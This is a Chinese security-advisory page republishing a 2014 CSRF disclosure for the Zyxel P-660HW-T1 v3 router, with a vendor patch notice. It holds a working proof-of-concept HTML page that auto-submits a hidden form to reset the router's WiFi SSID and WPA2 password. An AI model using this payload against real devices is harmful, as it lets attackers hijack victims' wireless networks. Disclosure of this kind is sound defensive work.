首页 / 操作系统 / Linux / Zyxel P-660HW-T1 v3无线路由器CSRF漏洞

发布日期：2014-05-29
更新日期：2014-05-31受影响系统：
ZyXEL P-660HW-T1 v3
描述：
--------------------------------------------------------------------------------
Zyxel P-660HW-T1是无线路由器产品。 P-660HW-T1无线路由器版本3的管理面板存在安全漏洞，攻击者可利用此漏洞在受影响设备上执行任意代码。
 
<*来源：Mustafa ALTINKAYNAK
 *>测试方法：
--------------------------------------------------------------------------------警 告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
Mustafa ALTINKAYNAK （）提供了如下测试方法：
 
# Exploit Title: Zyxel P-660HW-T1 v3 Wireless Router - CSRF Vulnerabilities
 # Date: 05/22/2014
 # Author: Mustafa ALTINKAYNAK
 # Vendor Homepage:http://www.zyxel.com/tr/tr/products_services/p_660hw_series.shtml？t=p
 # Category: Hardware/Wireless Router
 # Tested on: Zyxel P-660HW-T1 v3 Wireless Router
 # Patch/ Fix: Vendor has not provided any fix for this yet
 ---------------------------
 
 Technical Details
 ---------------------------
 This vulnerability was tested at the P-660HW-T1 devices. Admin panel is open you can run remote code destination.
 You can send the form below to prepare the target. Please offending. Being partners in crime. Disclosure Timeline
 ---------------------------
 05/21/2014  Contacted Vendor
05/22/2014  Vendor Replied
 04/22/2014  Vulnerability Explained （No reply received）
 05/23/2014  Full Disclosure Exploit Code
---------------------------
 
 Change Wifi （WPA2/PSK） password & SSID by CSRF
 ---------------------------------------------------------------------------------
 <html>
 <body onload="document.form.submit（）;">
 <form action="http://192.168.1.1/Forms/WLAN_General_1"
 method="POST" name="form">
 <input type="hidden" name="EnableWLAN" value="on">
 <input type="hidden" name="Channel_ID" value="00000005">
 <input type="hidden" name="ESSID" value="WIFI NAME">
 <input type="hidden" name="Security_Sel" value="00000002">
 <input type="hidden" name="SecurityFlag" value="0">
 <input type="hidden" name="WLANCfgPSK" value="123456">
 <input type="hidden" name="WLANCfgWPATimer" value="1800">
 <input type="hidden" name="QoS_Sel" value="00000000">
 <input type="hidden" name="sysSubmit" value="Uygula">
 </form>
 </body>
 </html>----------- Mustafa ALTINKAYNAK
 twitter : @m_altinkaynak <https://twitter.com/m_altinkaynak>
 www.mustafaaltinkaynak.com建议：
--------------------------------------------------------------------------------
厂商补丁：
 
ZyXEL
 -----
 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：
 
http://www.zyxel.com/tr/tr/products_services/p_660hw_series.shtml？t=p